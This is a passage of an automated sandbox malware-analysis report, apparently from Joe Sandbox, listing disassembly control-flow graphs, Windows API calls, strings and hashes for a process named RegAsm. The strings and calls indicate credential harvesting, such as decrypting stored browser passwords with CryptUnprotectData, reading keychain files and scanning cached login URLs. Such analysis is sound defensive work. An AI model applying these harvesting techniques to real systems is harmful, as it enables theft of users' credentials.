445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->87 255 445f9b 218->255 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 255->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                APIs
                                                                • memset.MSVCRT ref: 004455C2
                                                                • wcsrchr.MSVCRT ref: 004455DA
                                                                • memset.MSVCRT ref: 0044570D
                                                                • memset.MSVCRT ref: 00445725
                                                                  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                  • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                                  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                  • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                                • memset.MSVCRT ref: 0044573D
                                                                • memset.MSVCRT ref: 00445755
                                                                • memset.MSVCRT ref: 004458CB
                                                                • memset.MSVCRT ref: 004458E3
                                                                • memset.MSVCRT ref: 0044596E
                                                                • memset.MSVCRT ref: 00445A10
                                                                • memset.MSVCRT ref: 00445A28
                                                                • memset.MSVCRT ref: 00445AC6
                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                • memset.MSVCRT ref: 00445B52
                                                                • memset.MSVCRT ref: 00445B6A
                                                                • memset.MSVCRT ref: 00445C9B
                                                                • memset.MSVCRT ref: 00445CB3
                                                                • _wcsicmp.MSVCRT ref: 00445D56
                                                                • memset.MSVCRT ref: 00445B82
                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                • memset.MSVCRT ref: 00445986
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AttributesCloseCreateFolderHandlePathSizeSpecial_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                                • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                • API String ID: 381723030-3798722523
                                                                • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                • SetErrorMode.KERNEL32(00008001), ref: 00412799
                                                                • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Library$EnumErrorFreeHandleLoadMessageModeModuleResourceTypes
                                                                • String ID: $/deleteregkey$/savelangfile
                                                                • API String ID: 1442760552-28296030
                                                                • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                Control-flow Graph

                                                                APIs
                                                                • memset.MSVCRT ref: 0040B71C
                                                                  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                • wcsrchr.MSVCRT ref: 0040B738
                                                                • memset.MSVCRT ref: 0040B756
                                                                • memset.MSVCRT ref: 0040B7F5
                                                                • CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040B838
                                                                • memset.MSVCRT ref: 0040B851
                                                                • memset.MSVCRT ref: 0040B8CA
                                                                • memcmp.MSVCRT ref: 0040B9BF
                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                • memset.MSVCRT ref: 0040BB53
                                                                • memcpy.MSVCRT ref: 0040BB66
                                                                • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$Freewcsrchr$CloseCreateCryptDataFileHandleLibraryLocalUnprotectmemcmpmemcpywcscpy
                                                                • String ID: chp$v10
                                                                • API String ID: 229402216-2783969131
                                                                • Opcode ID: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                                                                • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                • Opcode Fuzzy Hash: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                                                                • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 505 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 508 413f00-413f11 Process32NextW 505->508 509 413da5-413ded OpenProcess 508->509 510 413f17-413f24 CloseHandle 508->510 511 413eb0-413eb5 509->511 512 413df3-413e26 memset call 413f27 509->512 511->508 513 413eb7-413ebd 511->513 520 413e79-413eae call 413959 call 413ca4 CloseHandle 512->520 521 413e28-413e35 512->521 515 413ec8-413eda call 4099f4 513->515 516 413ebf-413ec6 ??3@YAXPAX@Z 513->516 518 413edb-413ee2 515->518 516->518 526 413ee4 518->526 527 413ee7-413efe 518->527 520->511 524 413e61-413e68 521->524 525 413e37-413e44 GetModuleHandleW 521->525 524->520 530 413e6a-413e77 QueryFullProcessImageNameW 524->530 525->524 529 413e46-413e5c 525->529 526->527 527->508 529->524 530->520
                                                                APIs
                                                                  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                • memset.MSVCRT ref: 00413D7F
                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                • memset.MSVCRT ref: 00413E07
                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                                                • CloseHandle.KERNEL32(?), ref: 00413EA8
                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Handle$??3@CloseProcessProcess32memset$CreateFirstFullImageModuleNameNextOpenQuerySnapshotToolhelp32
                                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                • API String ID: 3791284831-1740548384
                                                                • Opcode ID: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                                                                • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                • Opcode Fuzzy Hash: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                                                                • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                  • Part of subcall function 0040DD85: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                  • Part of subcall function 0040DD85: CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                                  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                  • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                • WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                • CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                • String ID: bhv
                                                                • API String ID: 4234240956-2689659898
                                                                • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 562 4466f4-44670e call 446904 GetModuleHandleA 565 446710-44671b 562->565 566 44672f-446732 562->566 565->566 568 44671d-446726 565->568 567 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 566->567 577 4467ac-4467b7 __setusermatherr 567->577 578 4467b8-44680e call 4468f0 _initterm GetEnvironmentStringsW _initterm 567->578 569 446747-44674b 568->569 570 446728-44672d 568->570 569->566 573 44674d-44674f 569->573 570->566 572 446734-44673b 570->572 572->566 575 44673d-446745 572->575 576 446755-446758 573->576 575->576 576->567 577->578 581 446810-446819 578->581 582 44681e-446825 578->582 585 4468d8-4468dd call 44693d 581->585 583 446827-446832 582->583 584 44686c-446870 582->584 586 446834-446838 583->586 587 44683a-44683e 583->587 589 446845-44684b 584->589 590 446872-446877 584->590 586->583 586->587 587->589 591 446840-446842 587->591 593 446853-446864 GetStartupInfoW 589->593 594 44684d-446851 589->594 590->584 591->589 595 446866-44686a 593->595 596 446879-44687b 593->596 594->591 594->593 597 44687c-446894 GetModuleHandleA call 41276d 595->597 596->597 600 446896-446897 exit 597->600 601 44689d-4468d6 _cexit 597->601 600->601 601->585
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(00000000,0044E4C0,00000070), ref: 00446703
                                                                • __set_app_type.MSVCRT ref: 00446762
                                                                • __p__fmode.MSVCRT ref: 00446777
                                                                • __p__commode.MSVCRT ref: 00446785
                                                                • __setusermatherr.MSVCRT ref: 004467B1
                                                                • _initterm.MSVCRT ref: 004467C7
                                                                • GetEnvironmentStringsW.KERNEL32(?,?,?,?,0044E494,0044E498), ref: 004467EA
                                                                • _initterm.MSVCRT ref: 004467FD
                                                                • GetStartupInfoW.KERNEL32(?), ref: 0044685A
                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00446880
                                                                • exit.MSVCRT ref: 00446897
                                                                • _cexit.MSVCRT ref: 0044689D
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: HandleModule_initterm$EnvironmentInfoStartupStrings__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                • String ID:
                                                                • API String ID: 2791496988-0
                                                                • Opcode ID: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                • Opcode Fuzzy Hash: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                Control-flow Graph

                                                                APIs
                                                                • memset.MSVCRT ref: 0040C298
                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                • wcschr.MSVCRT ref: 0040C324
                                                                • wcschr.MSVCRT ref: 0040C344
                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                • GetLastError.KERNEL32 ref: 0040C373
                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                • String ID: visited:
                                                                • API String ID: 2470578098-1702587658
                                                                • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 628 40e175-40e1a1 call 40695d call 406b90 633 40e1a7-40e1e5 memset 628->633 634 40e299-40e2a8 call 4069a3 628->634 636 40e1e8-40e1fa call 406e8f 633->636 640 40e270-40e27d call 406b53 636->640 641 40e1fc-40e219 call 40dd50 * 2 636->641 640->636 647 40e283-40e286 640->647 641->640 652 40e21b-40e21d 641->652 648 40e291-40e294 call 40aa04 647->648 649 40e288-40e290 ??3@YAXPAX@Z 647->649 648->634 649->648 652->640 653 40e21f-40e235 call 40742e 652->653 653->640 656 40e237-40e242 call 40aae3 653->656 656->640 659 40e244-40e26b _snwprintf call 40a8d0 656->659 659->640
                                                                APIs
                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                • memset.MSVCRT ref: 0040E1BD
                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                • _snwprintf.MSVCRT ref: 0040E257
                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                • API String ID: 3883404497-2982631422
                                                                • Opcode ID: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
                                                                • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                • Opcode Fuzzy Hash: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
                                                                • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                  • Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                • memset.MSVCRT ref: 0040BC75
                                                                • memset.MSVCRT ref: 0040BC8C
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                • memcmp.MSVCRT ref: 0040BCD6
                                                                • memcpy.MSVCRT ref: 0040BD2B
                                                                • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                • String ID:
                                                                • API String ID: 115830560-3916222277
                                                                • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                • String ID: r!A
                                                                • API String ID: 2791114272-628097481
                                                                • Opcode ID: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                                • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                • Opcode Fuzzy Hash: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                                • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                  • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                • _wcslwr.MSVCRT ref: 0040C817
                                                                  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                • wcslen.MSVCRT ref: 0040C82C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                • API String ID: 62308376-4196376884
                                                                • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 770 40b58d-40b59e 771 40b5a4-40b5c0 GetModuleHandleW FindResourceW 770->771 772 40b62e-40b632 770->772 773 40b5c2-40b5ce LoadResource 771->773 774 40b5e7 771->774 773->774 775 40b5d0-40b5e5 SizeofResource LockResource 773->775 776 40b5e9-40b5eb 774->776 775->776 776->772 777 40b5ed-40b5ef 776->777 777->772 778 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 777->778 778->772
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                • memcpy.MSVCRT ref: 0040B60D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                • String ID: BIN
                                                                • API String ID: 1668488027-1015027815
                                                                • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
